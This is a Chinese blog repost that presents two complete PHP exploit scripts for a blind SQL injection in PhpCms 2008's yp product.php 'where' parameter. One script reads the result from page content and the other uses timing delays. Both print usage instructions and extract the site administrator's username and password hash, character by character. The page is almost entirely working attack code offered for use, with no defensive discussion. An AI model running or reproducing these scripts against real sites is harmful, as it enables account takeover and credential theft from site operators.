phpcms 2008 yp.php 0day exp

2010年5月23日星期日 | | |

文章作者:my5t3ry

第一个EXP:

<?php
ini_set("max_execution_time",0);
error_reporting(7);

function usage()
{
&nbsp; &nbsp; &nbsp; &nbsp; global $argv;
&nbsp; &nbsp; &nbsp; &nbsp; exit(
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; "\n--+++============================================================+++--".
&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;"\n--+++====== PhpCms 2008 Sp3 Blind SQL Injection Exploit&nbsp;&nbsp;========+++--".
&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;"\n--+++============================================================+++--".
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; "\n\n[+] Author&nbsp; &nbsp;: My5t3ry".
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; "\n[+] Team&nbsp; &nbsp;&nbsp;&nbsp;: [url]http://www.t00ls.net[/url]".
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; "\n[+] Usage&nbsp; &nbsp; : php ".$argv[0]." <hostname> <path>".
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; "\n[+] Ex.&nbsp; &nbsp;&nbsp; &nbsp;: php ".$argv[0]." localhost /yp".
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; "\n\n");
}

function query($pos, $chr, $chs)
{
&nbsp; &nbsp; &nbsp; &nbsp; global $prefix;
&nbsp; &nbsp; &nbsp; &nbsp; switch ($chs){
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; case 0:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $query = "#";
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; break;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; case 1:
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;$query = " ascii(substring((select username from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}#";
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; break;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; case 2:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $query = " ascii(substring((select password from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}#";
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; break;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; case 3:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $query = " length((select username from ".$prefix."member where groupid=1 limit 0,1))={$pos}#";
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; break;
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; $query = str_replace(" ", "/**/", $query);
&nbsp; &nbsp; &nbsp; &nbsp; $query = urlencode($query);
&nbsp; &nbsp; &nbsp; &nbsp; return $query;
}

function exploit($hostname, $path, $pos, $chr, $chs)
{
&nbsp; &nbsp; &nbsp; &nbsp; $chr = ord($chr);
&nbsp; &nbsp; &nbsp; &nbsp; $conn = fsockopen($hostname, 80);
&nbsp; &nbsp; &nbsp; &nbsp; //print_r($conn);
&nbsp; &nbsp; &nbsp; &nbsp; /*if (!$conn){
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; exit("\r\n[-] No response from $conn");
&nbsp; &nbsp; &nbsp; &nbsp; }*/

&nbsp; &nbsp; &nbsp; &nbsp; $postdata = "q=&action=searchlist&where=".query($pos, $chr, $chs);
&nbsp; &nbsp; &nbsp; &nbsp; $message = "POST ".$path."/product.php HTTP/1.1\r\n";
&nbsp; &nbsp; &nbsp; &nbsp; $message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
&nbsp; &nbsp; &nbsp; &nbsp; $message .= "Accept-Language: zh-cn\r\n";
&nbsp; &nbsp; &nbsp; &nbsp; $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
&nbsp; &nbsp; &nbsp; &nbsp; $message .= "Accept-Encoding: gzip, deflate\r\n";
&nbsp; &nbsp; &nbsp; &nbsp; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
&nbsp; &nbsp; &nbsp; &nbsp; $message .= "Host: $hostname\r\n";
&nbsp; &nbsp; &nbsp; &nbsp; $message .= "Content-Length: ".strlen($postdata)."\r\n";
&nbsp; &nbsp; &nbsp; &nbsp; $message .= "Connection: Close\r\n\r\n";
&nbsp; &nbsp; &nbsp; &nbsp; $message .= $postdata;
&nbsp; &nbsp; &nbsp; &nbsp; //echo $message;

&nbsp; &nbsp; &nbsp; &nbsp; fputs($conn, $message);
&nbsp; &nbsp; &nbsp; &nbsp; while (!feof($conn))
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $reply .= fgets($conn, 1024);

&nbsp; &nbsp; &nbsp; &nbsp; fclose($conn);
&nbsp; &nbsp; &nbsp; &nbsp; return $reply;
}

function crkusername($hostname, $path, $chs)
{
&nbsp; &nbsp; &nbsp; &nbsp; global $length;
&nbsp; &nbsp; &nbsp; &nbsp; $key = "abcdefghijklmnopqrstuvwxyz0123456789";
&nbsp; &nbsp; &nbsp; &nbsp; $chr = 0;
&nbsp; &nbsp; &nbsp; &nbsp; $pos = 1;
&nbsp; &nbsp; &nbsp; &nbsp; echo "[+] username: ";
&nbsp; &nbsp; &nbsp; &nbsp; while ($pos <= $length)
&nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $response = exploit($hostname, $path, $pos, $key[$chr], $chs);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; preg_match ("/<span class=\"time\">(.+)<\/span><\/strong>/i", $response, $match);

&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;if (strlen(trim($match[1])) != 0)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; echo $key[$chr];
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $chr = 0;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $pos++;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; else
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $chr++;
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; echo "\n";
}

function crkpassword($hostname, $path, $chs)
{
&nbsp; &nbsp; &nbsp; &nbsp; $key = "abcdef0123456789";
&nbsp; &nbsp; &nbsp; &nbsp; $chr = 0;
&nbsp; &nbsp; &nbsp; &nbsp; $pos = 1;
&nbsp; &nbsp; &nbsp; &nbsp; echo "[+] password: ";
&nbsp; &nbsp; &nbsp; &nbsp; while ($pos <= 32)
&nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $response = exploit($hostname, $path, $pos, $key[$chr], $chs);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; preg_match ("/<span class=\"time\">(.+)<\/span><\/strong>/i", $response, $match);

&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;if (strlen(trim($match[1])) != 0)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; echo $key[$chr];
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $chr = 0;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $pos++;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; else
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $chr++;
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; echo "\n\n";
}

function lengthcolumns($hostname, $path, $chs)
{
&nbsp; &nbsp; &nbsp; &nbsp; echo "[+] username length: ";
&nbsp; &nbsp; &nbsp; &nbsp; $exit = 0;
&nbsp; &nbsp; &nbsp; &nbsp; $length = 0;
&nbsp; &nbsp; &nbsp; &nbsp; $pos = 1;
&nbsp; &nbsp; &nbsp; &nbsp; $chr = 0;
&nbsp; &nbsp; &nbsp; &nbsp; while ($exit==0)
&nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $response = exploit($hostname, $path, $pos, $chr, $chs);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; preg_match ("/<span class=\"time\">(.+)<\/span><\/strong>/i", $response, $match);

&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if (strlen(trim($match[1])) != 0)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $exit = 1;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $length = $pos;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; else
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $pos++;
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; echo $length."\n";
&nbsp; &nbsp; &nbsp; &nbsp; return $length;
}

function getprefix($hostname, $path, $chs)
{
&nbsp; &nbsp; &nbsp; &nbsp; echo "[+] prefix: ";
&nbsp; &nbsp; &nbsp; &nbsp; $pos = 0;
&nbsp; &nbsp; &nbsp; &nbsp; $chr = 0;
&nbsp; &nbsp; &nbsp; &nbsp; $response = exploit($hostname, $path, $pos, $chr, $chs);
&nbsp; &nbsp; preg_match('/FROM `(.+)yp_product/ie',$response,$match);

&nbsp; &nbsp; &nbsp; &nbsp; if ($match[1])
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; return $match[1];
&nbsp; &nbsp; &nbsp; &nbsp; else
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; return false;
}


if ($argc != 3)
&nbsp; &nbsp; &nbsp; &nbsp; usage();
$prefix="";
$hostname = $argv[1];
$path = $argv[2];
$prefix = getprefix($hostname, $path, 0);
if ($prefix)
{
&nbsp; &nbsp; &nbsp; &nbsp; echo $prefix."\r\n";
&nbsp; &nbsp; &nbsp; &nbsp; $length = lengthcolumns($hostname, $path, 3);
&nbsp; &nbsp; &nbsp; &nbsp;
&nbsp; &nbsp; &nbsp; &nbsp; crkusername($hostname, $path, 1);
&nbsp; &nbsp; &nbsp; &nbsp; crkpassword($hostname, $path, 2);
}
else
{
&nbsp; &nbsp; &nbsp; &nbsp; exit("\r\n[-] Exploit failed");
}

?>

第二个EXP:

<?php
ini_set("max_execution_time",0);
error_reporting(7);

function usage()
{
&nbsp; &nbsp; &nbsp; &nbsp; global $argv;
&nbsp; &nbsp; &nbsp; &nbsp; exit(
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; "\n--+++============================================================+++--".
&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;"\n--+++====== PhpCms 2008 Sp3 Blind SQL Injection Exploit&nbsp;&nbsp;========+++--".
&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;"\n--+++============================================================+++--".
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; "\n\n[+] Author&nbsp; &nbsp;: My5t3ry".
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; "\n[+] Team&nbsp; &nbsp;&nbsp;&nbsp;: [url]http://www.t00ls.net[/url]".
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; "\n[+] Usage&nbsp; &nbsp; : php ".$argv[0]." <hostname> <path>".
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; "\n[+] Ex.&nbsp; &nbsp;&nbsp; &nbsp;: php ".$argv[0]." localhost /yp".
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; "\n\n");
}

function query($pos, $chr, $chs)
{
&nbsp; &nbsp; &nbsp; &nbsp; global $prefix;
&nbsp; &nbsp; &nbsp; &nbsp; switch ($chs){
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; case 1:
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;$query = "1=1 and if((ascii(substring((select username from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}),benchmark(10000000,md5(1)),1)#";
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; break;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; case 2:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $query = "1=1 and if((ascii(substring((select password from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}),benchmark(10000000,md5(1)),1)#";
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; break;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; case 3:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $query = "1=1 and if((length((select username from ".$prefix."member where groupid=1 limit 0,1))={$pos}),benchmark(10000000,md5(1)),1)#";
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; break;
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; $query = str_replace(" ", "/**/", $query);
&nbsp; &nbsp; &nbsp; &nbsp; $query = urlencode($query);
&nbsp; &nbsp; &nbsp; &nbsp; return $query;
}

function exploit($hostname, $path, $pos, $chr, $chs)
{
&nbsp; &nbsp; &nbsp; &nbsp; $chr = ord($chr);
&nbsp; &nbsp; &nbsp; &nbsp; $conn = fsockopen($hostname, 80);

&nbsp; &nbsp; &nbsp; &nbsp; $postdata = "q=&action=searchlist&where=".query($pos, $chr, $chs);
&nbsp; &nbsp; &nbsp; &nbsp; $message = "POST ".$path."/product.php HTTP/1.1\r\n";
&nbsp; &nbsp; &nbsp; &nbsp; $message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
&nbsp; &nbsp; &nbsp; &nbsp; $message .= "Accept-Language: zh-cn\r\n";
&nbsp; &nbsp; &nbsp; &nbsp; $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
&nbsp; &nbsp; &nbsp; &nbsp; $message .= "Accept-Encoding: gzip, deflate\r\n";
&nbsp; &nbsp; &nbsp; &nbsp; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
&nbsp; &nbsp; &nbsp; &nbsp; $message .= "Host: $hostname\r\n";
&nbsp; &nbsp; &nbsp; &nbsp; $message .= "Content-Length: ".strlen($postdata)."\r\n";
&nbsp; &nbsp; &nbsp; &nbsp; $message .= "Connection: Close\r\n\r\n";
&nbsp; &nbsp; &nbsp; &nbsp; $message .= $postdata;
&nbsp; &nbsp; &nbsp; &nbsp; //echo $message;

&nbsp; &nbsp; &nbsp; &nbsp; $time_a = time();

&nbsp; &nbsp; &nbsp; &nbsp; fputs($conn, $message);
&nbsp; &nbsp; &nbsp; &nbsp; while (!feof($conn))
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $reply .= fgets($conn, 1024);

&nbsp; &nbsp; &nbsp; &nbsp; $time_b = time();

&nbsp; &nbsp; &nbsp; &nbsp; fclose($conn);
&nbsp; &nbsp; &nbsp; &nbsp; //echo $time_b - $time_a."\r\n";

&nbsp; &nbsp; &nbsp; &nbsp; if ($time_b - $time_a > 4)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; return true;
&nbsp; &nbsp; &nbsp; &nbsp; else
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; return false;
}

function crkusername($hostname, $path, $chs)
{
&nbsp; &nbsp; &nbsp; &nbsp; global $length;
&nbsp; &nbsp; &nbsp; &nbsp; $key = "abcdefghijklmnopqrstuvwxyz0123456789";
&nbsp; &nbsp; &nbsp; &nbsp; $chr = 0;
&nbsp; &nbsp; &nbsp; &nbsp; $pos = 1;
&nbsp; &nbsp; &nbsp; &nbsp; echo "[+] username: ";
&nbsp; &nbsp; &nbsp; &nbsp; while ($pos <= $length)
&nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if (exploit($hostname, $path, $pos, $key[$chr], $chs))
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; echo $key[$chr];
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $chr = 0;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $pos++;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; else
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $chr++;
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; echo "\n";
}

function crkpassword($hostname, $path, $chs)
{
&nbsp; &nbsp; &nbsp; &nbsp; $key = "abcdef0123456789";
&nbsp; &nbsp; &nbsp; &nbsp; $chr = 0;
&nbsp; &nbsp; &nbsp; &nbsp; $pos = 1;
&nbsp; &nbsp; &nbsp; &nbsp; echo "[+] password: ";
&nbsp; &nbsp; &nbsp; &nbsp; while ($pos <= 32)
&nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if (exploit($hostname, $path, $pos, $key[$chr], $chs))
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; echo $key[$chr];
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $chr = 0;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $pos++;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; else
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $chr++;
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; echo "\n\n";
}

function lengthcolumns($hostname, $path, $chs)
{
&nbsp; &nbsp; &nbsp; &nbsp; echo "[+] username length: ";
&nbsp; &nbsp; &nbsp; &nbsp; $exit = 0;
&nbsp; &nbsp; &nbsp; &nbsp; $length = 0;
&nbsp; &nbsp; &nbsp; &nbsp; $pos = 0;
&nbsp; &nbsp; &nbsp; &nbsp; $chr = 0;
&nbsp; &nbsp; &nbsp; &nbsp; while ($exit==0)
&nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if (exploit($hostname, $path, $pos, $chr, $chs))
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $exit = 1;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $length = $pos;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; else
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $pos++;
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; echo $length."\n";
&nbsp; &nbsp; &nbsp; &nbsp; return $length;
}

function getprefix($hostname, $path)
{
&nbsp; &nbsp; &nbsp; &nbsp; echo "[+] prefix: ";
&nbsp; &nbsp; &nbsp; &nbsp; $conn = fsockopen($hostname, 80);
&nbsp; &nbsp; &nbsp; &nbsp; $request = "GET {$path}/product.php?q=&action=searchlist&where=%23 HTTP/1.1\r\n";
&nbsp; &nbsp; &nbsp; &nbsp; $request .= "Host: {$hostname}\r\n";
&nbsp; &nbsp; $request .= "Connection: Close\r\n\r\n";
&nbsp; &nbsp; &nbsp; &nbsp; fputs($conn, $request);
&nbsp; &nbsp; &nbsp; &nbsp; while (!feof($conn))
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $reply .= fgets($conn, 1024);

&nbsp; &nbsp; &nbsp; &nbsp; fclose($conn);
&nbsp; &nbsp; &nbsp; &nbsp; preg_match('/FROM `(.+)yp_product/ie',$reply,$match);

&nbsp; &nbsp; &nbsp; &nbsp; if ($match[1])
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; return $match[1];
&nbsp; &nbsp; &nbsp; &nbsp; else
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; return false;
}


if ($argc != 3)
&nbsp; &nbsp; &nbsp; &nbsp; usage();
$prefix="";
$hostname = $argv[1];
$path = $argv[2];
$prefix = getprefix($hostname, $path);
if ($prefix)
{
&nbsp; &nbsp; &nbsp; &nbsp; echo $prefix."\r\n";
&nbsp; &nbsp; &nbsp; &nbsp; $length = lengthcolumns($hostname, $path, 3);
&nbsp; &nbsp; &nbsp; &nbsp;
&nbsp; &nbsp; &nbsp; &nbsp; crkusername($hostname, $path, 1);
&nbsp; &nbsp; &nbsp; &nbsp; crkpassword($hostname, $path, 2);
}
else
{
&nbsp; &nbsp; &nbsp; &nbsp; exit("Exploit failed");
}

?>

 
 
我的QQ空间
再提供一种解决Nginx文件类型错误解析漏洞的方法
 昨日,80Sec 爆出Nginx具有严重的0day漏洞,详见《Nginx文件类...
 

0 评论:


所有文章收集于网络,如果有牵扯到版权问题请与本站站长联系。谢谢合作![email protected]